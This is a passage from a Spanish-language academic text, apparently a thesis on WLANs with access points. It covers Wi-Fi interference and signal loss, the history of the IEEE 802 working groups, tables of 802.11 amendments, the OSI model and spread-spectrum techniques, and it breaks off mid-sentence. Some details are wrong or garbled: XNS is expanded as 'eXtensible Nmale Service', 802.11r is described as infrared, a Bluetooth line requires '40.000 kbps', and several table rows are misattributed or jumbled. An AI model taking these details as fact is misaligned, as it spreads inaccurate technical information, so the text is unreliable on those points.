Esto significa que conforme se aumenta la distancia entre emisor y receptor, se puede ir
disminuyendo la velocidad de transmisión de datos.

2.6 INTERFERENCIA EN UNA RED EXTENSA.

Dado que la 802.11b utiliza la banda de 2.4 GHz y que estas frecuencias se encuentran en
una banda abierta para usos industriales, científicos y médicos para los que no se necesita
licencia, existe el riesgo de coincidir en el uso de la frecuencia con otros sistemas como los
microondas, teléfonos inalámbricos sistemas de vigilancia, dispositivos bluetooth o incluso
otras redes inalámbricas.

REDES WLAN CON ACCESS POINT 39


Estos otros pueden producir interferencias en las señales de radio de nuestra red. Una
interferencia consiste en la presencia no deseada de señales radioeléctricas que interrumpen
el normal funcionamiento del sistema. Para evitar que una interferencia pueda cortar la
comunicación cuando el equipo WiFi (protocolo Mac) detecta la presencia de una señal de
interferencia automáticamente entra en un periodo de espera en la idea de que, pasado
dicho periodo, habrá pasado la interferencia. Evidentemente esto hace que el servicio se
degrade, pero no se interrumpe. Desde el punto de vista del usuario, es imposible evitar las
interferencias esporádicas, pero lo que sí se puede evitar son las interferencias constantes
periódicas. El sistema consiste en hacer pruebas de recepción de señal en la zona bajo
sospecha. Estas pruebas pueden realizarse a distintas horas del día. A veces ocurre que las
interferencias solo se producen a la hora de la comida (microondas).Muchas de estas
interferencias pueden evitarse sencillamente situando el punto de acceso en otro lugar, o
moviendo la terminal.

2.7 PERDIDAS DE PROPAGACIÓN EN UNA RED EXTENSA.

Desde el momento que una señal de radio sale del equipo transmisor empieza a perder
potencia por el simple hecho de propagarse. Conforme aumenta la distancia desde el
emisor, las pérdidas de señal van en aumento. Esta pérdida de señal es mayor también
cuanto mayor es la frecuencia radioeléctrica a la que se emite. Por tanto, a mayor
frecuencia, menor es el alcance de la señal. Por otro lado generalmente no existe una línea
de visión directa entre el transmisor y receptor. Los obstáculos (como paredes, los arboles,
los muebles o los cristales) que impiden dicha visibilidad directa afectan grandemente a la
perdida de señal. Otro de los factores que afectan negativamente a la propagación de la
señal son los ecos producidos por el rebote de la señal en los obstáculos. El rebote produce
que la señal pueda tomar distintos caminos para llegar hasta el receptor. Al final lo que el
receptor recibe no es una única señal, sino una señal principal y una combinación de
señales iguales (ecos) que llegan a distinto tiempo y con distinta potencia. A esto se le
llama efecto eco, este efecto puede producir graves interferencias que llegan a degradar
fuertemente la recepción de la señal.

REDES WLAN CON ACCESS POINT 40


CAPÍTULO III
CARACTERÍSTICAS DE WIFI

INTRODUCCIÓN:

Cuando hablamos de WiFi nos referimos a una de las tecnologías de comunicación


inalámbrica mediante ondas más utilizada hoy en día. WIFI, también llamada WLAN
(Wireless LAN, red inalámbrica) o estándar IEEE 802.11. WIFI no es una abreviatura de
Wireless Fidelity, simplemente es un nombre comercial.

En la actualidad podemos encontrarnos con dos tipos de comunicación WIFI:

• 802.11b, que emite a 11 Mb/seg.

• 802.11g, más rápida, a 54 MB/seg.

En este capítulo vamos a describir los principios generales en los que se basa el
funcionamiento del estándar IEEE 802.11 como ya sabemos, esta familia de estándares
tiene miembros diversos con diferentes tecnologías. Nosotros nos concentraremos en
802.11b.

REDES WLAN CON ACCESS POINT 41


3.1 EVOLUCIÓN DE IEEE 802.

Uno de los factores más importantes para que una tecnología sea aceptada es la
normalización, el hecho de que la tecnología está perfectamente definida es que los
distintos fabricantes de equipos, componentes o software pueden hacer su trabajo con la
seguridad de ser aceptados por el mercado.

El organismo de normalización que más ha avanzado en la definición de normas de redes


de área local es el IEEE (Institute of Electrical and Electronics Engineers, ‘Instituto de
Ingenieros en Electricidad y Electrónica’).

En febrero de 1980 se formó en el IEEE un comité de redes locales con la intención de


estandarizar un sistema de 1 o 2 Mbps que básicamente era Ethernet (el de la época). Le
tocó el número 802. Decidieron estandarizar el nivel físico, el de enlace y superiores.
Dividieron el nivel de enlace en dos subniveles: el de enlace lógico, encargado de la lógica
de re-envíos, control de flujo y comprobación de errores, y el subnivel de acceso al medio,
encargado de arbitrar los conflictos de acceso simultáneo a la red por parte de las
estaciones.

Para final de año ya se había ampliado el estándar para incluir el Token Ring (Red en anillo
con paso de testigo) de IBM y un año después, y por presiones de grupos industriales, se
incluyó Token Bus (Red en bus con paso de testigo), que incluía opciones de tiempo real y
redundancia, y que se suponía idóneo para ambientes de fábrica.

Cada uno de estos tres "estándares" tenía un nivel físico diferente, un subnivel de acceso al
medio distinto pero con algún rasgo común (espacio de direcciones y comprobación de
errores), y un nivel de enlace lógico único para todos ellos.

REDES WLAN CON ACCESS POINT 42


Después se fueron ampliando los campos de trabajo, se incluyeron redes de área
metropolitana (alguna decena de kilómetros), personal (unos pocos metros) y regional
(algún centenar de kilómetros), se incluyeron redes inalámbricas (WLAN), métodos de
seguridad, comodidad, etc.

El estándar 802.11 establece los niveles inferiores del modelo OSI para las conexiones
inalámbricas que utilizan ondas electromagnéticas, por ejemplo:

• La capa física (a veces abreviada capa "PHY") ofrece tres tipos de codificación de
información.

• La capa de enlace de datos compuesta por dos subcapas: control de enlace lógico
(LLC) y control de acceso al medio (MAC).

• La capa física define la modulación de las ondas de radio y las características de


señalización para la transmisión de datos mientras que la capa de enlace de datos
define la interfaz entre el bus del equipo y la capa física, en particular un método de
acceso parecido al utilizado en el estándar Ethernet, y las reglas para la
comunicación entre las estaciones de la red. En realidad, el estándar 802.11 tiene
tres capas físicas que establecen modos de transmisión alternativos:

Figura 3.1 Capa de Enlace y Capa Física.

REDES WLAN CON ACCESS POINT 43


3.2 REDES DE CABLE

De las siete capas del modelo OSI la norma IEEE 802 define exclusivamente los temas
relacionados con las dos primeras: las capas física y de enlace. Uno de los temas que se
definen en estas dos capas son las técnicas de acceso las cuales definen como cada terminal
puede hacer uso del medio de comunicación común.

Las primeras técnicas de acceso que definió la IEEE 802 se pensaron para las redes de
cable. De esta forma, empezaron a surgir los primeros miembros de la familia 802,
explicado en la Tabla 3.1:

• IEEE 802.3 define una tecnología conocida como CSMAICD (Carrier Sense
Multiple Access With Collision Detection, ‘Acceso Múltiple por Detección de
Portadora con Detección de Colisión’). A esta norma se le conoce más comúnmente
como el nombre de Ethernet. No obstante, aunque ambas están basadas en
CSMA/CD, IEEE 802.3 es un estándar, mientras que Ethernet es un protocolo
inventado por Bob Metcalfe.

• IEEE802.4 define una tecnología conocida como tokenbus o red de área local en
bus con paso de testigo.

• IEEE 802.5 define una tecnología conocida como tokenring o red de área local en
anillo con paso de testigo.

El estándar 802.11 en realidad es el primer estándar y permite un ancho de banda de 1 a 2


Mbps. El estándar original se ha modificado para optimizar el ancho de banda (incluidos
los estándares 802.11a, 802.11b y 802.11g, denominados estándares físicos 802.11) o para
especificar componentes de mejor manera con el fin de garantizar mayor seguridad o
compatibilidad.

REDES WLAN CON ACCESS POINT 44


Tabla 3.1 Grupos de trabajo del Comité de Normalización IEEE 802.

Estándar Nombre

802.1 Normalización de interfaz.


802.2 Control de enlace lógico.
802.3 CSMA / CD (ETHERNET).
802.4 Token bus.
802.5 Token ring.
802.6 MAN (ciudad) (fibra óptica).
802.7 Grupo Asesor en Banda ancha.
802.8 Grupo Asesor en Fibras Ópticas.
802.9 Voz y datos en LAN.
802.10 Seguridad.
802.11 Redes inalámbricas WLAN.
802.12 Prioridad por demanda.
802.13 Se ha evitado su uso por superstición.
802.14 Módems de cable.
802.15 WPAN (Bluetooth).
802.16 Redes de acceso metropolitanas sin hilos de banda ancha (WIMAX).
802.17 Anillo de paquete elástico.
802.18 Grupo de Asesoría Técnica sobre Normativas de Radio.
802.19 Grupo de Asesoría Técnica sobre Coexistencia.
802.20 Mobile Broadband Wireless Access.
802.21 Media Independent Handoff.
802.22 Wireless Regional Área Network.

REDES WLAN CON ACCESS POINT 45


3.3 REDES INALÁMBRICAS.

En 1997 el IEEE añadió un nuevo miembro a la familia 802 que se ocupa de definir las
redes de área local inalámbricas. Este nuevo miembro es el 802.11. La primera norma
802.11 utilizaba infrarrojos como medio de transmisión. Esta norma nunca tuvo una buena
aceptación en el mercado. Posteriormente, salieron otras dos normas 802.11 basadas en el
uso de radiofrecuencia en la banda de 2.4 GHz Ambas se diferencian en el método de
transmisión de radio utilizado. Una utiliza el sistema FHSS (Frecuency Hopping Spread
Spectrum, ‘Difusión por Salto de Frecuencia’) y la otra, el sistema DSSS (Direct Spectrum
Spread Spectrum, ‘Difusión por secuencia directa’). Por otro lado, aparecieron tres nuevas
versiones de la norma 802.11, explicadas en la Tabla 3.2

• IEEE 802.11b, que subía la velocidad de transmisión a los 11 Mbps. Por este
motivo se le conoció también como 802.11HR (High Rate, ‘Alta Velocidad).

• IEEE 802.11a, esta norma se diferencia de 802.11b en el hecho de que no utiliza la


banda de los 2.4 GHz sino la de los 5 GHz y que utiliza una técnica de transmisión
conocida como OFDM (Orthogonal Frequency División Multiplexing,
‘Multiplexación Ortogonal por división de frecuencia’). La gran ventaja es que se
consiguen velocidades de 54 Mbps; llegándose a alcanzar los 72 y 108 Mbps con
versiones propietarias de esta tecnología. El mayor inconveniente es que la
tecnología de semiconductores para 5GHz no está suficientemente desarrollada
todavía.

• IEEE 802.11g, esta norma surgió en el año 2001 con la idea de aumentar la
velocidad sin renunciar a las ventajas de la banda de los 2.4 GHz Esta norma
permite transmitir datos a 54 Mbps. En cualquier caso, existen versiones
propietarias de esta tecnología que llega a los 100 Mbps.

REDES WLAN CON ACCESS POINT 46


Tabla 3.2 a) Grupos de trabajo y de estudio relacionados con el IEEE 802.1.

Estándar Nombre Descripción


El estándar 802.11 (llamado WiFi 5) admite un ancho de
banda superior (el rendimiento total máximo es de 54
802.11a Wifi5 Mbps aunque en la práctica es de 30 Mpbs). El estándar
802.11a provee ocho canales de radio en la banda de
frecuencia de 5 GHz.
El estándar 802.11 es el más utilizado actualmente.
Ofrece un rendimiento total máximo de 11 Mpbs (6
Mpbs en la práctica) y tiene un alcance de hasta 300
802.11b WiFi
metros en un espacio abierto. Utiliza el rango de
frecuencia de 2,4 GHz con tres canales de radio
disponibles.
El estándar combinado 802.11c no ofrece ningún interés
para el público general. Es solamente una versión
Combinación del
802.11c modificada del estándar 802.1d que permite combinar el
802.11 y el 802.1d
802.1d con dispositivos compatibles 802.11 (en el nivel
de enlace de datos).
El estándar 802.11d es un complemento del estándar 802.11
que está pensado para permitir el uso internacional de las redes
802.11d Internacionalización 802.11 locales. Permite que distintos dispositivos intercambien
información en rangos de frecuencia según lo que se permite
en el país de origen del dispositivo.
El estándar 802.11e está destinado a mejorar la calidad del
servicio en el nivel de la capa de enlace de datos. El objetivo
Mejora de la calidad
802.11e del estándar es definir los requisitos de diferentes paquetes en
del servicio
cuanto al ancho de banda y al retardo de transmisión para
permitir mejores transmisiones de audio y vídeo.

REDES WLAN CON ACCESS POINT 47


Tabla 3.2 b) Grupos de trabajo y de estudio relacionados con el IEEE 802.1.

El 802.11f es una recomendación para proveedores de puntos de


acceso que permite que los productos sean más compatibles. Utiliza
el protocolo IAPP que le permite a un usuario itinerante cambiarse
802.11f Itinerancia claramente de un punto de acceso a otro mientras está en
movimiento sin importar qué marcas de puntos de acceso se usan en
la infraestructura de la red. También se conoce a esta propiedad
simplemente como itinerancia.
El estándar 802.11g ofrece un ancho de banda elevado (con un
rendimiento total máximo de 54 Mbps pero de 30 Mpbs en la
práctica) en el rango de frecuencia de 2,4 GHz. El estándar 802.11g
802.11g
es compatible con el estándar anterior, el 802.11b, lo que significa
que los dispositivos que admiten el estándar 802.11g también
pueden funcionar con el 802.11b.
El estándar 802.11h tiene por objeto unir el estándar 802.11 con el
estándar europeo (HiperLAN 2, de ahí la h de 802.11h) y cumplir
802.11h
con las regulaciones europeas relacionadas con el uso de las
frecuencias y el rendimiento energético.
El estándar 802.11i está destinado a mejorar la seguridad en la
transferencia de datos (al administrar y distribuir claves, y al
802.11i implementar el cifrado y la autenticación). Este estándar se basa en
el AES (estándar de cifrado avanzado) y puede cifrar transmisiones
que se ejecutan en las tecnologías 802.11a, 802.11b y 802.11g.
El estándar 802.11r se elaboró para que pueda usar señales
802.11Ir
infrarrojas. Este estándar se ha vuelto tecnológicamente obsoleto.
El estándar 802.11j es para la regulación japonesa lo que el 802.11h
802.11j
es para la regulación europea.

REDES WLAN CON ACCESS POINT 48


3.4 MEJORAS AL IEEE 802.11

En el interés de disponer de unos estándares inalámbricos lo antes posible, al desarrollar sus


normas, el IEEE no se paró a considerar determinadas características (como la calidad de
servicio, seguridad, utilización del espectro etc.) que hubiesen producido un estándar más
robusto. Para resolver este problema, el IEEE ha creado posteriormente unos grupos de
trabajo para desarrollar estándares que resuelvan estos problemas y que puedan ser
añadidos fácilmente el protocolo principal. Estos grupos son los siguientes:

• IEEE 802.11e (Calidad de servicio). Este grupo trabaja en los aspectos relacionados
con la calidad de servicios (QoS o Quality of Services) en el mundo de las redes de
datos, calidad de servicio significa poder mas prioridad de transmisión a unos
paquetes de datos que a otros dependiendo de la naturaleza de la información (voz,
video, imágenes, etc) por ejemplo la información de voz necesita ser transmitida en
tiempo real mientras que la información de datos originada por una transferencia de
archivo da igual que llegue medio segundo antes o después.

• IEEE 802.11h (Gestión de espectro). Este grupo de trabajo pretende conseguir una
mejora de la norma 802.11a en cuanto a la gestión del espectro. Este punto es una
de las ventajas que tiene IEEE 802.11a frente a sus competidor europeo
HiperLAN/2 (que también opera en la banda de 5 GHz)

• IEEE 802.11i (seguridad). El sistema de seguridad que utiliza 802.11 está basado en
el sistema WEP. Este sistema ha siso criticado fuertemente debido a su debilidad.
Este grupo de trabajo pretende sacar un nuevo sistema mucho más seguro que
sustituya a WEP.

REDES WLAN CON ACCESS POINT 49


3.5 EL SURGIMIENTO DE WIFI

El problema principal que pretende resolver la normalización es la compatibilidad. No


obstante, como hemos visto, existen distintos estándares que definen distintos tipos de
redes inalámbricas. Esta variedad produce confusión en el mercado y descoordinación entre
los fabricantes. Para resolver este problema los principales vendedores de soluciones
inalámbricas (3Com,Aironet, Intersil, Lucent Technologies, Nokia y Symbol Technologies
crearon en 1999 una asociación conocida como WECA (Wireless Ethernet Compatibility
Alliance, Alianza de Compatibilidad Ethernet Inalámbrica). Esta asociación pasó a
denominarse Wi-Fi Alliance en 2003.

El objetivo de la misma fue crear una marca que permitiese fomentar más fácilmente la
tecnología inalámbrica y asegurar la compatibilidad de equipos. De esta forma, en abril de
2000 WECA certifica la interoperabilidad de equipos según la norma IEEE 802.11b, bajo la
marca Wi-Fi. Esto quiere decir que el usuario tiene la garantía de que todos los equipos que
tengan el sello Wi-Fi pueden trabajar juntos sin problemas, independientemente del
fabricante de cada uno de ellos.

Se puede obtener un listado completo de equipos que tienen la certificación Wi-Fi en


Alliance - Certified Products. En el año 2002 la asociación WECA estaba formada ya por
casi 150 miembros en su totalidad.

Existen diversos tipos de Wi-Fi, basado cada uno de ellos en un estándar IEEE 802.11
aprobado. Son los siguientes:

• Los estándares IEEE 802.11b, IEEE 802.11g e IEEE 802.11n disfrutan de una
aceptación internacional debido a que la banda de 2.4 GHz está disponible casi
universalmente, con una velocidad de hasta 11 Mbps , 54 Mbps y 300 Mbps,
respectivamente.

REDES WLAN CON ACCESS POINT 50


• En la actualidad ya se maneja también el estándar IEEE 802.11a, conocido como
WIFI 5, que opera en la banda de 5 GHz y que disfruta de una operatividad con
canales relativamente limpios. La banda de 5 GHz ha sido recientemente habilitada
y, además, no existen otras tecnologías (Bluetooth, microondas, ZigBee, WUSB)
que la estén utilizando, por lo tanto existen muy pocas interferencias. Su alcance es
algo menor que el de los estándares que trabajan a 2.4 GHz (aproximadamente un
10%), debido a que la frecuencia es mayor (a mayor frecuencia, menor alcance).

• Un primer borrador del estándar IEEE 802.11n que trabaja a 2.4 GHz y a una
velocidad de 108 Mbps. Sin embargo, el estándar 802.11g es capaz de alcanzar ya
transferencias a 108 Mbps, gracias a diversas técnicas de aceleramiento.
Actualmente existen ciertos dispositivos que permiten utilizar esta tecnología,
denominados Pre-N.

• Existen otras tecnologías inalámbricas como Bluetooth que también funcionan a una
frecuencia de 2.4 GHz, por lo que puede presentar interferencias con Wi-Fi. Debido
a esto, en la versión 1.2 del estándar Bluetooth por ejemplo se actualizó su
especificación para que no existieran interferencias con la utilización simultánea de
ambas tecnologías, además se necesita tener 40.000 kbps.

3.5.1 COMPATIBILIDAD ENTRE WIFI Y ETHERNET

La norma IEEE 802.11 fue diseñada para sustituir el equivalente a las capas físicas
y MAC de la norma 802.3 (Ethernet). Esto quiere decir que en lo único que se diferencia
una red Wi-Fi de una red Ethernet es en cómo se transmiten las tramas o paquetes de datos;
el resto es idéntico. Por tanto, una red local inalámbrica 802.11 es completamente
compatible con todos los servicios de las redes locales (LAN) de cable 802.3 (Ethernet).

REDES WLAN CON ACCESS POINT 51


3.6 DEFINICIÓN DE PROTOCOLO

En cualquier comunicación, sea entre personas o entre máquinas, siempre hace falta una
serie de normas que regulen dicho proceso. En el caso de las comunicaciones entre
personas, las normas las establece la sociedad y son aplicadas por cada persona de acuerdo
con la educación que haya recibido en el caso de la informática, los protocolos son reglas
de comunicación que permiten el flujo de información entre equipos que manejan lenguajes
distintos, por ejemplo, dos computadores conectados en la misma red pero con protocolos
diferentes no podrían comunicarse jamás, para ello, es necesario que ambas "hablen" el
mismo idioma.

El protocolo TCP/IP fue creado para las comunicaciones en Internet. Para que cualquier
computador se conecte a Internet es necesario que tenga instalado este protocolo de
comunicación un protocolo es un conjunto de reglas usadas por computadoras para
comunicarse unas con otras a través de una red. Un protocolo es una convención o estándar
que controla o permite la conexión, comunicación, y transferencia de datos entre dos puntos
finales. En su forma más simple, un protocolo puede ser definido como las reglas que
dominan la sintaxis, semántica y sincronización de la comunicación.

Los protocolos pueden ser implementados por hardware, software, o una combinación de
ambos. A su más bajo nivel, un protocolo define el comportamiento de una conexión de
hardware. Desde un principio, los programas de comunicaciones escritos personalizados
permitían que una computadora hablara con otra. Si queríamos hablar con una computadora
diferente, teníamos que escribir un programa nuevo. Este método no podía ampliarse más
que a unas cuantas computadoras. Los primeros intentos de solucionar este problema
fueron protocolos patentados que permitían a las computadoras del mismo fabricante hablar
unas con otras. Ninguno de estos protocolos se utiliza mucho hoy en día, pero el UUCP
(Unix-to-Unix Copy Program, programa de copia de Unix a Unix) es parecido en un
concepto: un protocolo monolítico que puede utilizarse sólo con otra computadora que
comprenda UUCP.

REDES WLAN CON ACCESS POINT 52


Afortunadamente, UUCP está ampliamente disponible, en lugar de estar bloqueado como
un protocolo específico de distribuidor. (Aún más afortunado es el hecho de que UUCP ya
no se utiliza casi, y en la mayoría de los casos en los que se hace, se implementa de tras de
TCP). La siguiente etapa en la evolución de los protocolos fue el protocolo en capas. En
este modelo, el protocolo está dividido en capas dispuestas en una pila (como los platos en
un armario). Cada una de estas capas está compuesta de uno o más protocolos, una
desafortunada duplicación de terminología.

Cada capa pasa información verticalmente dentro de la pila. Ejemplos de protocolos en


capas que no son TCP/IP incluyen el XNS (eXtensible Nmale Service). Servicio de
nombres extensible; el ancestro de la pila de protocolos Novell) y la SNA (System Network
Architecture, Arquitectura de redes de sistemas; el protocolo de comunicaciones de IBM).
Normalmente, se habla de los protocolos en capas en términos de modelo de siete capas
OSI. Cada capa es responsable de ciertas funciones dentro de la red (por ejemplo, la capa
de red direcciona y encamina paquetes y la capa de presentación cifra y comprime datos).

3.7 MODELO OSI

Una de las características común a todas las comunicaciones actuales de computadoras es el


hecho de que todas estructuran el proceso de comunicación en distintos niveles o capas,
siguiendo el esquema de este modelo se crearon numerosos protocolos. El advenimiento de
protocolos más flexibles donde las capas no están tan demarcadas y la correspondencia con
los niveles no era tan clara puso a este esquema en un segundo plano. Sin embargo es muy
usado en la enseñanza como una manera de mostrar cómo puede estructurarse una "pila" de
protocolos de comunicaciones.

El modelo especifica el protocolo que debe ser usado en cada capa, y suele hablarse de
modelo de referencia ya que es usado como una gran herramienta para la enseñanza de
comunicación de redes. Este modelo está dividido en siete capas numeradas, cada una de
las cuales ilustra una función de red especifica, como se muestra en la Figura 3.1

REDES WLAN CON ACCESS POINT 53


Capa Física (Capa 1).

Es la que se encarga de las conexiones físicas de la computadora hacia la red, tanto en lo


que se refiere al medio físico como a la forma en la que se transmite la información.

Sus principales funciones se pueden resumir como:

• Definir el medio o medios físicos por los que va a viajar la comunicación: cable de
pares trenzados (o no, como en RS232/EIA232), coaxial, guías de onda, aire, fibra
óptica.

• Definir las características materiales (componentes y conectores mecánicos) y


eléctricas (niveles de tensión) que se van a usar en la transmisión de los datos por
los medios físicos.

• Definir las características funcionales de la interfaz (establecimiento,


mantenimiento y liberación del enlace físico).

• Transmitir el flujo de bits a través del medio.

• Manejar las señales eléctricas del medio de transmisión, polos en un enchufe, etc.

• Garantizar la conexión (aunque no la fiabilidad de dicha conexión).

Capa de Enlace de Datos (Capa 2).

Esta capa se ocupa del direccionamiento físico, de la topología de la red, del acceso a la
red, de la notificación de errores, de la distribución ordenada de tramas y del control del
flujo.

REDES WLAN CON ACCESS POINT 54


Como objetivo o tarea principal, la capa de enlace de datos se encarga de tomar una
transmisión de datos, cruda y transformarla en una abstracción libre de errores de
transmisión para la capa de red. Este proceso se lleva a cabo dividiendo los datos de entrada
en marcos de datos (de unos cuantos cientos de bytes), transmite los marcos en forma
secuencial, y procesa los marcos de estado que envía el nodo destino.

Capa de Red (Capa 3).

El objetivo de la capa de red es hacer que los datos lleguen desde el origen al destino, aun
cuando ambos no estén conectados directamente. Los dispositivos que facilitan tal tarea se
denominan en caminadores, aunque es más frecuente encontrar el nombre inglés routers y,
en ocasiones enrutadores. Los routers trabajan en esta capa, aunque pueden actuar como
switch de nivel 2 en determinados casos, dependiendo de la función que se le asigne. Los
firewalls actúan sobre esta capa principalmente, para descartar direcciones de máquinas. En
este nivel se realiza el direccionamiento lógico y la determinación de la ruta de los datos
hasta su receptor final.

Capa de Transporte (Capa 4).

Capa encargada de efectuar el transporte de los datos (que se encuentran dentro del
paquete) de la máquina origen a la de destino, independizándolo del tipo de red física que
se esté utilizando. La PDU de la capa 4 se llama Segmento o Datagrama, dependiendo de si
corresponde a TCP o UDP. Sus protocolos son TCP y UDP; el primero orientado a
conexión y el otro sin conexión.

Capa de Sesión (Capa 5).

Esta capa es la que se encarga de mantener y controlar el enlace establecido entre dos
computadores que están transmitiendo datos de cualquier índole.

REDES WLAN CON ACCESS POINT 55


Por lo tanto, el servicio provisto por esta capa es la capacidad de asegurar que, dada una
sesión establecida entre dos máquinas, la misma se pueda efectuar para las operaciones
definidas de principio a fin, reanudándolas en caso de interrupción. En muchos casos, los
servicios de la capa de sesión son parcial o totalmente prescindibles.

Capa de Presentación (Capa 6).

El objetivo es encargarse de la representación de la información, de manera que aunque


distintos equipos puedan tener diferentes representaciones internas de caracteres los datos
lleguen de manera reconocible. Esta capa es la primera en trabajar más el contenido de la
comunicación que el cómo se establece la misma. En ella se tratan aspectos tales como la
semántica y la sintaxis de los datos transmitidos, ya que distintas computadoras pueden
tener diferentes formas de manejarlas. Esta capa también permite cifrar los datos y
comprimirlos. En pocas palabras es un traductor.

Capa de aplicación (Capa 7).

Ofrece a las aplicaciones la posibilidad de acceder a los servicios de las demás capas y
define los protocolos que utilizan las aplicaciones para intercambiar datos, como correo
electrónico (POP y SMTP), gestores de bases de datos y servidor de ficheros (FTP), por
UDP pueden viajar (DNS y RIP). Hay tantos protocolos como aplicaciones distintas y
puesto que continuamente se desarrollan nuevas aplicaciones el número de protocolos crece
sin parar.

Cabe aclarar que el usuario normalmente no interactúa directamente con el nivel de


aplicación. Suele interactuar con programas que a su vez interactúan con el nivel de
aplicación pero ocultando la complejidad subyacente. En cualquier caso, de todos los
procedimientos definidos por OSI, los que siempre están presentes en cualquier tipo de
comunicación son aquellos que están incluidos dentro de las capas físicas y de enlace.

REDES WLAN CON ACCESS POINT 56


Figura 3.2 Modelo OSI

3.8 FUNCIONAMIENTO DE WIFI

Una red WiFi puede estar formada por dos computadoras o por miles de ellas, para que una
computadora pueda comunicarse de forma inalámbrica, se necesita que se le instale un
adaptador de red. Un adaptador de red es un equipo de radio (como transmisor, receptor y
antena) que puede ser insertado o conectado a una computadora, PDA o cualquier otro
equipo susceptible de formar parte de la red. De forma general a los equipos que forman
parte de una red inalámbrica se les conoce como terminales.

Aparte de los adaptadores de red, las redes WiFi pueden disponer también de unos equipos
que reciben el nombre de puntos de acceso es como una estación base utilizada para
gestionar las comunicaciones entre los distintas terminales. Los puntos de acceso funcionan
de forma autónoma sin necesidad de ser conectados directamente a ninguna computadora.

REDES WLAN CON ACCESS POINT 57


Tanto a las terminales como a los puntos de acceso de les conoce por el nombre general de
estación. Las estaciones se comunican entre sí gracias a que utilizan la misma banda de
frecuencia y a que internamente tienen instalados el mismo conjunto de protocolos, aunque
los protocolos que utiliza WiFi están basados en las siete capas del modelo de referencia
OSI, el estándar IEEE 802.11 b solo define las dos primeras capas (física y enlace; el resto
de las capas son idénticas a las empleadas en las redes locales cableadas e internet y se
conocen con el nombre de conjuntos de protocolos IP (Internet Protocolo ’Protocolo
Internet’). Los diferentes estándares, incluido IEEE 802.11 permiten que aparezcan nuevas
versiones de ese mismo estándar simplemente modificando una de las capas esto facilita no
solo la evolución de los estándares, sino que un mismo equipo pueda ser compatible con
distintas versiones de un estándar. Por ejemplo IEEE 802.11b solo se diferencia de IEEE
802.11 en que su capa física permite transmitir datos a velocidad alta.

3.9 LAS CAPAS DE IEEE 802.

El estándar IEEE 802.11 define el uso de los dos niveles inferiores de la arquitectura OSI
(capas física y de enlace de datos), especificando sus normas de funcionamiento en una
WLAN. Los protocolos de la rama 802.x definen la tecnología de redes de área local y
redes de área metropolitana.

• PHY (Physical Layer, capa física). Es la interfaz entre el MAC y el medio


inalámbrico. Provee de tres niveles de funcionalidad: intercambiar tramas entre
PHY y MAC, utilizar portador de señal (signal carrier) y modulación de espectro
ensanchado (spread spectrum) para transmitir tramas a través del medio y proveer al
MAC de un indicador de detección de portadora (carrier sense indication) para
señalizar actividad en el medio. El PHY está dividido en dos sub-capas, el PLCP
(Physical Layer Convergence Procedure) más cercano al MAC y el PMD (Physical
Medium Dependent Layer), que interacciona con el medio inalámbrico (WM en sus
siglas en inglés).

REDES WLAN CON ACCESS POINT 58


• MAC (Medium Access Control, ’Control de acceso medio’) es la capa que
determina la asignación del canal para la transmisión, es decir, establece cuál es la
estación que transmitirá a continuación.

• LLC (Logical Link Control): su trabajo es ocultar las diferencias entre las diferentes
variantes de los estándares 802 de modo que sean indistinguibles para las capas
superiores.

3.10 LA CAPA FÍSICA

El estándar original define tres opciones para el PHY operando a 1 y 2 Mbps en la banda de
2,4 GHz. Éstos son el Frequency Hopping Spread Spectrum (FHSS), el Direct Sequence
Spread Spectrum (DSSS) y una especificación de infrarrojo (IR). En 1999 dos nuevos PHY
fueron ratificados, por un lado el 802.11b que, usando técnicas DSSS, provee velocidades
de 1, 2, 5.5 y 11 Mbps y por otro lado el 802.11a que usando técnicas OFDM en la banda
UNII (Unlicenced National Information Infrastructure) de 5GHz ofrece velocidades de
acceso de hasta 54Mbps.

Todas las tramas que utilizan los PHY descritos incluyen una cabecera y un preámbulo
PLCP. El preámbulo se utiliza por el receptor para adquirir la señal entrante y sincronizar
con el demodulador. La cabecera PLCP contiene información acerca del paquete MAC
transmitido, tal como la duración o la velocidad de transmisión utilizada. La información
incluida depende del PHY utilizado. El conjunto de cabecera PLCP, preámbulo PLCP y
paquete MAC, llamado MPDU (MAC Protocol Data Unit), conforma lo que se llama PHY
Protocol Data Unit (PPDU) y se puede ver en la Figura1. Es importante destacar que la
cabecera y preámbulo PLCP se transmitan siempre a 1Mbps para que todas las estaciones
que cumplan el estándar sean capaces de descodificarlos y analizarlos.

REDES WLAN CON ACCESS POINT 59


3.11 ESPECTRO EXPANDIDO.

Es una técnica de modulación empleada en telecomunicaciones para la transmisión de datos


digitales y por radiofrecuencia. El fundamento básico es el "expandirse" de la señal a
transmitir a lo largo de una banda muy ancha de frecuencias, mucho más amplia, de hecho,
que el ancho de banda mínimo requerido para transmitir la información que se quiere
enviar. No se puede decir que las comunicaciones mediante espectro expandido son
medios eficientes de utilización del ancho de banda. Sin embargo, rinden al máximo
cuando se los combina con sistemas existentes que hacen uso de la frecuencia.

La señal de espectro expandido, una vez expandido puede coexistir con señales en banda
estrecha, ya que sólo les aportan un pequeño incremento en el ruido. En lo que se refiere al
receptor de espectro expandido, él no ve las señales de banda estrecha, ya que está
escuchando un ancho de banda mucho más amplio gracias a una secuencia de código
preestablecido. Existen distintas técnicas de espectro expandido, en las que se encuentra la
tecnología CDMA utilizada en la tercera generación de telefonía móvil, no obstante, IEEE
802.11 contempla solo dos técnicas distintas de aspecto expandido:

• FHSS (Frequency Hopping Spread Spectrum, ‘Espectro expandido por salto de


frecuencia) es una técnica de modulación en espectro expandido en el que la señal
se emite sobre una serie de radiofrecuencias aparentemente aleatorias, saltando de
frecuencia en frecuencia sincrónicamente con el transmisor.

• DSSS (Sequence spread spectrum, ‘Espectro expandido por secuencia directa),


también conocido en comunicaciones móviles como DS-CDMA (acceso múltiple
por división de código en secuencia directa), es uno de los métodos de modulación
en espectro expandido para transmisión de señales digitales sobre ondas
radiofónicas que más se utilizan.

REDES WLAN CON ACCESS POINT 60


Tanto DSSS como FHSS están definidos por la IEEE en el estándar 802.11 para redes de
área local inalámbricas WLAN. Este esquema de transmisión se emplea, con alguna
variación, en sistemas CDMA asíncronos (como por ejemplo UMTS).

3.11.1 FHSS

FHSS (Espectro ensanchado por salto de frecuencia). La tecnología de espectro expandido


por salto en frecuencia (FHSS) consiste en transmitir una parte de la información en una
determinada frecuencia durante un intervalo de tiempo llamada del time e inferior a 400
ms. Pasado este tiempo se cambia la frecuencia de emisión y se sigue transmitiendo a otra
frecuencia. De esta manera cada tramo de información se va transmitiendo en una
frecuencia distinta durante un intervalo muy corto de tiempo. El orden en los saltos en
